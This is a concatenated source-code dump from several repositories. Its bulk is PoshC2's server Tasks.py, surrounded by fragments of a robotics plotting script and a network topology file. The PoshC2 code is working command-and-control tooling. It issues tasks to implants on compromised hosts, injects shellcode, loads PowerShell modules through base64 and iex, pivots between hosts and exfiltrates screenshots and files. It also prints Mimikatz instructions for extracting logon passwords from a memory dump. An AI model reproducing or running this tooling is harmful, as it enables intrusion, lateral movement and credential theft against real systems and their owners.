data.append(nm_to_fim_diff_perc[nm])
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(111)
pu.boxplot_compare(ax, xlabels, [data], data_labels, colors, legend=False)
ax.set_ylabel("FIM diff. (\%)")
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
plt.tight_layout()
fig.savefig(os.path.join(top_save_dir, 'fim_diffs_boxplot.png'), bbox_inches='tight')
def _computeAndWriteOptimalOrientDiff(nm_to_res, selected_nms, nm_to_label, top_save_dir=None):
orient_diffs = {}
for nm in selected_nms:
print('- calculating {} ...'.format(nm))
orient_diff_per_metric = {}
oo_results = nm_to_res[nm]['optim_orient']
for m in kMetrics:
diffs_i = []
for o_map, o_pc in zip(oo_results[m]['map'], oo_results[m]['pc']):
cos_val = max(-1.0,
min(1.0,
np.dot(o_map, o_pc) / (np.linalg.norm(o_map) * np.linalg.norm(o_pc))))
diffs_i.append(np.rad2deg(np.arccos(cos_val)))
print(Style.DIM + "{}: {} ({})".format(m, np.median(diffs_i), np.std(diffs_i)))
orient_diff_per_metric[m] = diffs_i
orient_diffs[nm] = orient_diff_per_metric
if top_save_dir:
with open(os.path.join(top_save_dir, 'orient_diffs_{}.txt'.format(nm)), 'w') as f:
for m in kMetrics:
f.write('{} {}\n'.format(m, ' '.join([str(v)
for v in orient_diff_per_metric[m]])))
return orient_diffs
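# Illustrative helper (never called by the pipeline): the per-sample error used in
# _computeAndWriteOptimalOrientDiff above is the angle between the map-based and the
# point-cloud-based optimal view directions, with the cosine clipped to [-1, 1] to
# guard against numerical round-off before taking arccos.
def _example_orient_angle_deg(o_map, o_pc):
    o_map = np.asarray(o_map, dtype=float)
    o_pc = np.asarray(o_pc, dtype=float)
    cos_val = np.clip(np.dot(o_map, o_pc) / (np.linalg.norm(o_map) * np.linalg.norm(o_pc)),
                      -1.0, 1.0)
    return np.rad2deg(np.arccos(cos_val))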
def _boxplotOrientDiffs(orient_diffs, names, nm_to_label, top_save_dir):
xlabels = kMetricsLabels
data_labels = [nm_to_label[v] for v in names]
colors = [kPallete[i] for i, v in enumerate(names)]
data = []
for nm in names:
data_i = []
for m in kMetrics:
data_i.append(orient_diffs[nm][m])
data.append(data_i)
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(111)
pu.boxplot_compare(ax, xlabels, data, data_labels, colors)
ax.set_ylabel("Orientation diff. (deg)")
plt.tight_layout()
fig.savefig(os.path.join(top_save_dir, 'orient_diffs_boxplot.png'), bbox_inches='tight')
def _compareContinuousMotion(nm_to_res, selected_nms, nm_to_label, top_save_dir):
pc_cont_motion_res = nm_to_res[selected_nms[0]]
pc_rot_metrics = logAndNormalize(pc_cont_motion_res['cont_metrics']['rot']['pc'])
pc_trans_metrics = logAndNormalize(pc_cont_motion_res['cont_metrics']['trans']['pc'])
fig_rot = plt.figure(figsize=(8, 6))
ax_rot = fig_rot.add_subplot(111)
ax_rot.plot(pc_rot_metrics, label='Point Cloud')
for nm_i in selected_nms:
ax_rot.plot(logAndNormalize(nm_to_res[nm_i]['cont_metrics']
['rot']['map']), label=nm_to_label[nm_i])
ax_rot.set_xticks([])
ax_rot.set_xlabel('Continuous Rotation')
ax_rot.set_ylabel('Normalized Det.')
plt.legend()
plt.tight_layout()
fig_rot.savefig(os.path.join(top_save_dir, 'continuous_rotation.png'), bbox_inches='tight')
fig_trans = plt.figure(figsize=(8, 6))
ax_trans = fig_trans.add_subplot(111)
ax_trans.plot(pc_trans_metrics, label='Point Cloud')
for nm_i in selected_nms:
ax_trans.plot(logAndNormalize(nm_to_res[nm_i]
['cont_metrics']['trans']['map']), label=nm_to_label[nm_i])
ax_trans.set_xticks([])
ax_trans.set_xlabel('Continuous Translation')
# ax_trans.set_ylabel('Normalized Det.')
# plt.legend()
plt.tight_layout()
fig_trans.savefig(os.path.join(top_save_dir, 'continuous_translation.png'), bbox_inches='tight')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--res_dir', required=True)
parser.add_argument('--analyze_config', required=True)
parser.add_argument('--save_dir', type=str, default='analysis_results')
parser.add_argument('--pc_res_key', type=str, default='quad_info_0p5')
parser.set_defaults(map_names=['quad_info', 'quad_trace', 'gp_info', 'gp_trace'])
args = parser.parse_args()
print(Fore.YELLOW + args.__dict__.__str__())
with open(args.analyze_config, 'r') as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
print("Read configurations:\n{}".format(cfg))
map_names = []
map_nm_to_label = {}
for d in cfg['all_maps']:
map_nm_to_label.update(d)
for k in d:
map_names.append(k)
print(Fore.GREEN + "Maps to compare:\n- {}".format('\n- '.join(map_names)))
print(Fore.GREEN + "Labels:\n{}".format(map_nm_to_label))
fim_map_nms = [v for v in map_names if 'info' in v]
compare_orient_map_nms = [v for v in map_names if 'info' in v]
compare_cont_motion_map_nms = [v for v in map_names if 'info' in v]
print("Will analyze FIM for {}".format(fim_map_nms))
print("Will compare orientations for {}".format(compare_orient_map_nms))
print("Will compare cont. motion for {}".format(compare_cont_motion_map_nms))
save_dir = os.path.join(args.res_dir, args.save_dir)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
else:
print(Fore.RED + "Save folder exists, will re-use and overwrite.")
print("Going to save to {}".format(save_dir))
map_nm_to_res = {}
for map_nm in map_names:
print(Fore.GREEN + "====> Reading {}...".format(map_nm))
map_nm_to_res[map_nm] = readResults(args.res_dir, map_nm)
print(Fore.YELLOW + Style.BRIGHT + "Start analysis.")
print(Fore.GREEN + "1. Table of complexity.")
_writeComplexityTable(map_nm_to_res, args.pc_res_key, map_names, map_nm_to_label,
os.path.join(save_dir, 'complexity_table.txt'))
print(Fore.GREEN + "2. FIM difference.")
map_nm_to_fim_diff_perc = _computeAndWriteFIMDiff(
map_nm_to_res, fim_map_nms, map_nm_to_label, save_dir)
_boxplotFIMDiffs(map_nm_to_fim_diff_perc, fim_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + "3. Optimal views.")
map_nm_to_orient_diff = _computeAndWriteOptimalOrientDiff(
map_nm_to_res, compare_orient_map_nms, map_nm_to_label, save_dir)
_boxplotOrientDiffs(map_nm_to_orient_diff, compare_orient_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + "4. Continous motion.")
_compareContinuousMotion(map_nm_to_res, compare_cont_motion_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + Style.BRIGHT + "Start processing specified subsets...")
sel_dir = os.path.join(save_dir, 'selected_results')
if not os.path.exists(sel_dir):
os.makedirs(sel_dir)
if 'sel_complexity_table_entries' in cfg:
print(Fore.GREEN + "- complexity table")
_writeComplexityTable(map_nm_to_res, args.pc_res_key, cfg['sel_complexity_table_entries'], map_nm_to_label, os.path.join(
sel_dir, 'complexity_table.txt'))
if 'sel_fro_norm_table_entries' in cfg:
print(Fore.GREEN + "- FIM diff. table")
sel_fim_nms = cfg['sel_fro_norm_table_entries']
sel_nm_to_fim_diff = _computeAndWriteFIMDiff(
map_nm_to_res, sel_fim_nms, map_nm_to_label, sel_dir)
_boxplotFIMDiffs(sel_nm_to_fim_diff, sel_fim_nms, map_nm_to_label, sel_dir)
if 'sel_hist_orient_entries' in cfg:
sel_orient_nms = cfg['sel_hist_orient_entries']
print(Fore.GREEN + "- Orientation diff.")
sel_nm_to_orient_diff = _computeAndWriteOptimalOrientDiff(
map_nm_to_res, sel_orient_nms, map_nm_to_label, sel_dir)
_boxplotOrientDiffs(sel_nm_to_orient_diff, sel_orient_nms, map_nm_to_label, sel_dir)
if 'sel_cont_motion_plot' in cfg:
print(Fore.GREEN + "- continuous motion")
_compareContinuousMotion(
map_nm_to_res, cfg['sel_cont_motion_plot'], map_nm_to_label, sel_dir)
|
poshc2/server/Tasks.py | slackr/PoshC2 | 1,504 | 17027 | import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+")
miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
                            # First find the 'next' file that would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
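# Illustrative sketch only (not used by the server): the download-file branch in
# newTaskOutput above expects every returned blob to begin with a 10-character header,
# the first 5 characters holding the chunk number and the next 5 the total number of
# chunks, followed by the raw file bytes. This helper simply mirrors that slicing.
def _example_parse_download_chunk(rawoutput):
    header = rawoutput[:10]
    if isinstance(header, bytes):
        header = header.decode("utf-8")
    chunk_number = header[:5]
    total_chunks = header[5:]
    payload = rawoutput[10:]
    return chunk_number, total_chunks, payload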
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
if implant_type.lower().startswith('c#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.lower().startswith('ps'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('py'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('jxa'):
command = f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
if PBind:
command = f"pbind-command {command}"
if FComm:
command = f"fcomm-command {command}"
filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError('Task ID is greater than 5 characters which is not supported.')
print(Colours.YELLOW)
if user is not None and user != "":
print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
print(user_command[0:200])
print("----TRUNCATED----")
else:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if task[2].startswith("loadmodule "):
try:
module_name = (task[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
command=""
elif task[2].startswith("run-exe Program PS "):
try:
cmd = (task[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-pivot-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
doublebase64string = base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % doublebase64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command run-exe Program PS "):
try:
cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pslo "):
try:
module_name = (task[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pslo"):
try:
module_name = (task[2]).replace("pbind-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-loadmodule "):
try:
module_name = (task[2]).replace("pbind-pivot-loadmodule ", "")
if ".exe" in module_name or ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
base64string = base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")
command = f"run-exe PBind PBind {base64string}"
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-pslo"):
try:
module_name = (task[2]).replace("fcomm-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-loadmodule "):
try:
module_name = (task[2]).replace("pbind-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command "):
try:
cmd = command.replace("pbind-command ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-connect"):
command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
elif task[2].startswith("pbind-kill"):
command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
elif task[2].startswith("fcomm-loadmodule "):
try:
module_name = (task[2]).replace("fcomm-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command "):
command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
elif task[2].startswith("fcomm-connect"):
command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
elif task[2].startswith("fcomm-kill"):
command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
elif task[2].startswith("pbind-pivot-command "):
try:
cmd = command.replace("pbind-pivot-command ", "")
base64string1 = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
base64string = base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-connect"):
command = command.replace("pbind-pivot-connect ", "run-exe PBind PBind run-exe PBind PBind start ")
elif task[2].startswith("pbind-pivot-kill"):
command = command.replace("pbind-pivot-kill", "run-exe PBind PBind run-exe PBind PBind kill-implant")
# Uncomment to print actual commands that are being sent
# if "AAAAAAAAAAAAAAAAAAAA" not in command:
# print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(task[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return responseVal
elif RandomURI in path and not tasks:
                # if there are no tasks but it's a normal beacon, send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return default_response()
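# Illustrative sketch only (not called by PoshC2): newTask above prefixes every queued
# command with its zero-padded 5-digit task ID, joins multiple commands with the
# "!d-3dion@LD!-d" separator and wraps the batch in a "multicmd" prefix before it is
# encrypted with the implant key. This helper just reproduces that packing for clarity.
def _example_pack_multicmd(task_id_to_command):
    packed = []
    for task_id, command in task_id_to_command.items():
        packed.append(str(task_id).zfill(5) + command)
    return "multicmd" + "!d-3dion@LD!-d".join(packed)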
|
ryu/gui/views/topology.py | uiuc-srg/ryu | 269 | 17033 | # Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
